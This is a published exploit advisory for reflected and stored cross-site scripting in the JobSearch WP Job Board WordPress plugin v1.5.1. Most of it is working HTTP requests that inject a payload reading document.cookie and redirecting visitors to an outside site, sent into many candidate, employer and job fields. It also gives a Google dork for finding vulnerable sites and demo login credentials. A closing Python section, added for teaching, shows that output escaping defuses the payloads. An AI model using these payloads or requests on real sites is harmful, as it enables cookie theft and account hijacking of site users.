JobSearch WP Job Board WordPress Plugin v1.5.1 - Multiple Vulnerabilities

2020.07.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[+] Exploit Title: JobSearch WP Job Board WordPress Plugin v1.5.1 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/plugins/wp-jobsearch/
[+] Date: 2020-07-03
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Eyecix [ http://eyecix.com ]
[+] Software Version: 1.5.1
[+] Software Link: https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856
[+] Tested on: Debian 10
[+] CVE:
[+] CWE: CWE-79

### [ Info: ]

[i] An Unauthenticated Reflected XSS and multiple Authenticated Persistent XSS vulnerabilities were discovered in the JobSearch plugin through 1.5.1 for WordPress.
[i] The Authenticated Persistent XSS on the Job Page triggers in the dashboard area /user-dashboard/?tab=manage-jobs and on the job page itself.
[i] Demo account #1 (Candidate): vladvector / DJKNFU#$&H#IUFD (login / password)
[i] Demo account #2 (Employer): vladvector2 / DJKNFU#$&H#IUFD (login / password)
[i] Candidate Profile URL: https://eyecix.com/plugins/jobsearch/candidate/vladvector/
[i] Employer Profile URL: https://eyecix.com/plugins/jobsearch/employer/vladvector/
[i] Employer Job URL: https://eyecix.com/plugins/jobsearch/job/poc/

### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS -> /?location=[payload]
[x] Authenticated Persistent XSS -> Candidate Profile (vulnerable fields: Phone, Dial Code, Job Title, Academic Level, Age, Salary, Gender, Industry, Full Address)
[x] Authenticated Persistent XSS -> Employer Profile (vulnerable fields: Phone, Dial Code, Founded Since, Member Title, Designation, Experience, Facebook URL, Google+ URL, Twitter URL, LinkedIn URL, Description, Full Address)
[x] Authenticated Persistent XSS -> Job Page (vulnerable fields: Offered Salary, Career Level, Experience, Gender, Industry, Qualifications, Job Description, Full Address)

### [ Payload: ]

[$] "--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->

### [ PoC Unauthenticated Reflected XSS: ]

[!] https://eyecix.com/plugins/jobsearch/?location=%22%20autofocus%20onfocus%3Dalert%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3Balert%28document.domain%29%3Bwindow.location%3D%60https%3A%2F%2Ftwitter.com%2Fvlad_vector%60%3B%20%22%3E

[!] GET /plugins/jobsearch/?location=%22%20autofocus%20onfocus%3Dalert%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3Balert%28document.domain%29%3Bwindow.location%3D%60https%3A%2F%2Ftwitter.com%2Fvlad_vector%60%3B%20%22%3E HTTP/1.1
Host: eyecix.com

### [ PoC Authenticated Persistent XSS -> Candidate User Profile: ]

[!] POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------27142012921130118151484572765
Content-Length: 6644
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_cvr_photo_cand"; filename=""
Content-Type: application/octet-stream

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_user_dob_whole"

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_phone"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="dial_code"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="contry_iso_code"

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_sector"

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_candidate_jobtitle"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_type"

type_1
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary"

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_currency"

default
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_pos"

left
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_sep"

,
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_deci"

2
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_bio"

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="academic-level"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="Age"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="salary"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="gender"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="industry"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_facebook_url"

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_twitter_url"

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_linkedin_url"

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_dribbble_url"

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location1"

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location2"

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location3"

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_address"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_lat"

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------27142012921130118151484572765--

### [ PoC Authenticated Persistent XSS -> Employer User Profile: ]

[!] POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------321608141216835281602774802175
Content-Length: 6868
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_cvr_photo"; filename=""
Content-Type: application/octet-stream

-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="display_name"

PoC
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_phone"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="dial_code"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="contry_iso_code"

-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_website"

-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_sector"

-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_mm"

1
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_dd"

1
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_yy"

1900
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_bio"

-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="founded-since"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_facebook_url"

-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_twitter_url"

-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_linkedin_url"

-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_dribbble_url"

-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location1"

-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location2"

-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location3"

-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_address"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_lat"

37.090240
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-95.712891
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

12
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream

-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_title[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_designation[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_experience[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream

-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_image[]"

-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_facebook[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_google[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_twitter[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_linkedin[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_description[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------321608141216835281602774802175--

### [ PoC Authenticated Persistent XSS -> Job Page: ]

[!] POST /plugins/jobsearch/post-new-jobs/ HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------35378657672420857749655614298
Content-Length: 5216
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/post-new-jobs/
Cookie: [cookies_here]

-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_title"

PoC
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_detail"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="application_deadline"

-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_sector"

12
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_type"

4
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="get_job_skills[]"

poc
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_type"

internal
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_url"

-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_email"

-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_type"

type_1
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_max_salary"

-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_currency"

default
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_pos"

left
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_sep"

,
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_deci"

2
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="offered-salary"

31337"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="career-level"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="experience"

4-years"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="gender"

male"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="Industry"

graphics-designing"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="qualifications"

masters-degree"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_attach_files[]"; filename=""
Content-Type: application/octet-stream

-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location1"

-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location2"

-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location3"

-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_address"

"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_lat"

-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="user_job_posting"

1
-----------------------------35378657672420857749655614298--

### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector
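The following is an added example, not code from the plugin, its vendor or the advisory's author. It takes the two payloads quoted above (the reflected `?location=` value, percent-decoded, and the stored value from the multipart PoCs), echoes each into two constructed stand-in templates (a quoted attribute and an HTML comment; the plugin's real templates are not shown on this page), and uses the standard-library HTML parser to list which event-handler attributes end up on live elements. `html.escape(quote=True)` stands in for the WordPress `esc_attr()` call that the vulnerable fields lack; with it applied, nothing executes.

```python
"""Why the JobSearch payloads execute, and what output escaping does to them."""
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# Reflected payload: percent-decoded from the advisory's ?location= PoC URL.
REFLECTED = unquote(
    "%22%20autofocus%20onfocus%3Dalert%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3B"
    "alert%28document.domain%29%3Bwindow.location%3D%60https%3A%2F%2F"
    "twitter.com%2Fvlad_vector%60%3B%20%22%3E"
)
# Stored payload: the value submitted in the advisory's multipart PoCs.
STORED = (
    '"--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);'
    '(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->'
)
# Constructed stand-ins for the plugin's output (not its real templates): a field
# echoed into a quoted attribute, and a field echoed inside an HTML comment.
SINKS = {
    "attribute": '<input type="text" name="{field}" value="{value}">',
    "comment": "<!-- {field}: {value} -->",
}


def render(sink, field, value, escape):
    """Echo value into the chosen sink. escape=True applies html.escape with
    quote=True, the stdlib counterpart of WordPress esc_attr(): it neutralises
    the attribute-closing quote and the '>' that would end a comment."""
    if escape:
        value = html.escape(value, quote=True)
    return SINKS[sink].format(field=field, value=value)


class LiveHandlerFinder(HTMLParser):
    """Record on* attributes on elements the parser actually creates. Text that
    a comment swallows reaches handle_comment instead, so it is never a hit."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, _value in attrs:
            if name.startswith("on"):
                self.hits.append((tag, name))


def live_event_handlers(fragment):
    """Return [(tag, attribute), ...] for each event handler that would run."""
    parser = LiveHandlerFinder()
    parser.feed(fragment)
    parser.close()
    return parser.hits


def audit():
    """Map (sink, payload, escaped) -> live handlers for every combination."""
    payloads = {"reflected": REFLECTED, "stored": STORED}
    return {
        (sink, name, esc): live_event_handlers(render(sink, "f", value, esc))
        for sink in SINKS
        for name, value in payloads.items()
        for esc in (False, True)
    }


if __name__ == "__main__":
    for key, hits in audit().items():
        print(key, "->", hits or "inert")
```

The audit shows the difference between the two payloads: the reflected one only breaks out of a quoted attribute, while the stored one closes an attribute and a comment in the same string, so it fires in both contexts until the value is escaped.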

References:

https://github.com/vladvector/vladvector.github.io/blob/master/exploit/2020-07-03-jobsearch-wp-job-board-wordpress-plugin-v1-5-1.txt
https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856

Copyright 2020, cxsecurity.com
